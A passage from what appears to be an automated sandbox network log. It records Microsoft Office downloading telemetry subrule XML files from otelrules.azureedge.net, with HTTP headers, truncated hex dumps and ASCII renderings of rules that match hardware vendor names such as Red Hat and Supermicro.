                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB3CAEBB8"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 6fd3b960-801e-00ac-6c64-3bfd65000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111027Z-178bfbc474b9fdhphC1NYCac0n000000018000000000ba20
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            67192.168.2.44980813.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:27 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 416
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB5284CCE"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 1a8bda6d-001e-002b-2468-3b99f2000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111027Z-178bfbc474bq2pr7hC1NYCkfgg00000001n0000000001dwx
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:27 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            68192.168.2.44980913.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:29 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:29 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B91EAD002"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 171aa64f-101e-005a-5b63-3b882b000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111029Z-178bfbc474bvjk8shC1NYC83ns000000016g000000008x67
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:29 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            69192.168.2.44981013.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:29 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:29 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 432
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BAABA2A10"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: de17e165-601e-0002-3161-3ba786000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111029Z-178bfbc474b9xljthC1NYCtw94000000015g00000000fm4w
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:29 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            70192.168.2.44981113.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:29 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:29 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 475
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BBA740822"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 9cb1ed33-701e-0021-398c-3a3d45000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111029Z-r1d97b99577ndm4rhC1TEBf0ps0000000a9g00000000d0yf
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:29 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            71192.168.2.44981213.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:29 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:29 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 427
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BB464F255"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 5c5a59ff-301e-003f-5b8c-3a266f000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111029Z-1777c6cb754mrj2shC1TEB6k7w0000000b600000000045km
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:29 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            72192.168.2.44981313.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:29 UTC192OUTGET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:29 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 474
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA4037B0D"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 302889d7-401e-0047-2e63-3b8597000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111029Z-178bfbc474bvjk8shC1NYC83ns0000000170000000007z4p
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:30 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            73192.168.2.44981413.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:31 UTC192OUTGET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:31 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 419
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582BA6CF78C8"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 38897bff-401e-000a-368c-3a4a7b000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111031Z-1777c6cb754dqb2khC1TEBmk1s0000000b200000000023zg
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:31 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 55 75 5d 5b 50 70 5d 5b 43 63 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 55 75 5d 5b 44 64 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120675" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <SR T="2" R="([Uu][Pp][Cc][Ll][Oo][Uu][Dd])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            74192.168.2.44981513.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:31 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                            Date: Thu, 21 Nov 2024 11:10:31 GMT
                                                                                                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                                                                            ETag: "0x8DC582B984BF177"
                                                                                                                                                                                                                                                                                                            x-ms-request-id: 18e5e448-501e-000a-7b67-3b0180000000
                                                                                                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                            x-azure-ref: 20241121T111031Z-178bfbc474bp8mkvhC1NYCzqnn000000019g000000002ndk
                                                                                                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:31 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                            75192.168.2.44981713.107.246.45443
                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                            2024-11-21 11:10:31 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
